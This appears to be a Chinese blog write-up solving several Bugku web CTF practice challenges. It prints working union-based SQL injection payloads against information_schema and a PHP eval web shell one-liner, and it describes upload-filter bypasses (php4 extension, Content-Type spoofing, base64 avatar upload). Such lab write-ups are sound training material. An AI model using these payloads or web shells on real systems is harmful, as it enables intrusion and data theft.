当前位置: 首页 > news >正文

[Bugku] web-CTF靶场系列系列详解⑥!!!

平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

           平台有题库、赛事预告、工具库、Writeup库等模块。

------------------------------------

bp

 打开环境:

直接启用bp爆破

 

跑出来密码为zxc123

得到flag

--------------------------------------

成绩查询

               开启环境:

 打开页面

         先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。常用的闭合方式还用id = “input_id”,id = (“input_id”),id = (‘input_id’)等等),看来过滤了–+

查看列数:观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列

-------------------

接下来就开始暴库名、表名、字段名

尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据

我们先手遍历一遍 id=-1’ union select 1,2,3,4#

发现有四个表且都有回显,于是 就开始爆破吧

首先爆库名:通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf

然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc 

      接下来爆字段:通过id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制(将表名fl4g转换为16进制)绕过

得到字段skctf_flag

最后就是查询数据了:通过使用:id=-1’ union select 1,2,3,skctf_flag from fl4g#

得到flag

---------------------------------

xxx二手交易市场

                      开启环境:

打开题目,点击进入链接,是一个二手交易市场平台 

想着可不可能是修改购买价格,然后发现根本没有购买功能,只能先注册登录看看 

      感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;前两个防护做的挺好的,看看头像上传,上传文件,抓包 

 

看到后面好长一串,image参数后面是文件后缀JPEG,然后有base 64,再后面应该是图片的base64编码,看看传个一句马试试先把<?php @eval($_POST['yuchen']);?>base64加密一下,提换掉后面的一长串,然后改一下后缀为php

响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag 

 

 

得到flag

----------------------------------

文件上传

          开启环境:

打开直接上传一句话木马图片抓包

修改后缀为php上传

不行,经过不断尝试发现文件后缀改为php4
头部大写一个字母
数据处Content-Type改为image/jpeg
即可成功绕过

蚁剑连接

-------------------------------------------

[+-<>]

      打开环境:

直接使用AmanCTF - Brainfuck/OoK解密

得到flag

相关文章:

  • Leetcode每日刷题之75. 颜色分类(C++)
  • 搭建AI知识库:打造坚实的团队知识堡垒
  • MySQL —— CRUD
  • LeetCode——3143. 正方形中的最多点数
  • Qt Creator卡顿
  • python开发上位机 - PyCharm环境搭建、安装PyQt5及工具
  • k8s中yaml文件的编写
  • mysql 监控开始时间,结束时间,平均取n个时间点
  • Android 14适配记录
  • 智能爬虫ScrapeGraphAI尝鲜
  • Linux Shell编程--脚本运行与变量置换
  • C++ 重要特性探究
  • Java二十三种设计模式-享元模式(12/23)
  • vue3实现商品图片放大镜效果(芋道源码yudao-cloud 二开笔记)
  • Jmeter--http信息头管理器的使用(转载)
  • 时间复杂度分析经典问题——最大子序列和
  • Android路由框架AnnoRouter:使用Java接口来定义路由跳转
  • Android系统模拟器绘制实现概述
  • ES10 特性的完整指南
  • Idea+maven+scala构建包并在spark on yarn 运行
  • mongo索引构建
  • -- 查询加强-- 使用如何where子句进行筛选,% _ like的使用
  • 翻译:Hystrix - How To Use
  • 海量大数据大屏分析展示一步到位:DataWorks数据服务+MaxCompute Lightning对接DataV最佳实践...
  • 基于 Babel 的 npm 包最小化设置
  • 基于MaxCompute打造轻盈的人人车移动端数据平台
  • 老板让我十分钟上手nx-admin
  • 一些基于React、Vue、Node.js、MongoDB技术栈的实践项目
  • Mac 上flink的安装与启动
  • ​​​​​​​sokit v1.3抓手机应用socket数据包: Socket是传输控制层协议,WebSocket是应用层协议。
  • ​​快速排序(四)——挖坑法,前后指针法与非递归
  • ​linux启动进程的方式
  • #经典论文 异质山坡的物理模型 2 有效导水率
  • (01)ORB-SLAM2源码无死角解析-(56) 闭环线程→计算Sim3:理论推导(1)求解s,t
  • (06)Hive——正则表达式
  • (1)(1.11) SiK Radio v2(一)
  • (31)对象的克隆
  • (android 地图实战开发)3 在地图上显示当前位置和自定义银行位置
  • (C++哈希表01)
  • (delphi11最新学习资料) Object Pascal 学习笔记---第13章第1节 (全局数据、栈和堆)
  • (DenseNet)Densely Connected Convolutional Networks--Gao Huang
  • (Redis使用系列) Springboot 整合Redisson 实现分布式锁 七
  • (void) (_x == _y)的作用
  • (二)换源+apt-get基础配置+搜狗拼音
  • (附源码)ssm学生管理系统 毕业设计 141543
  • (六)库存超卖案例实战——使用mysql分布式锁解决“超卖”问题
  • (四)【Jmeter】 JMeter的界面布局与组件概述
  • (一)Docker基本介绍
  • .java 9 找不到符号_java找不到符号
  • .locked1、locked勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .NET Core使用NPOI导出复杂,美观的Excel详解
  • .net SqlSugarHelper
  • .NET 使用 JustAssembly 比较两个不同版本程序集的 API 变化
  • .Net7 环境安装配置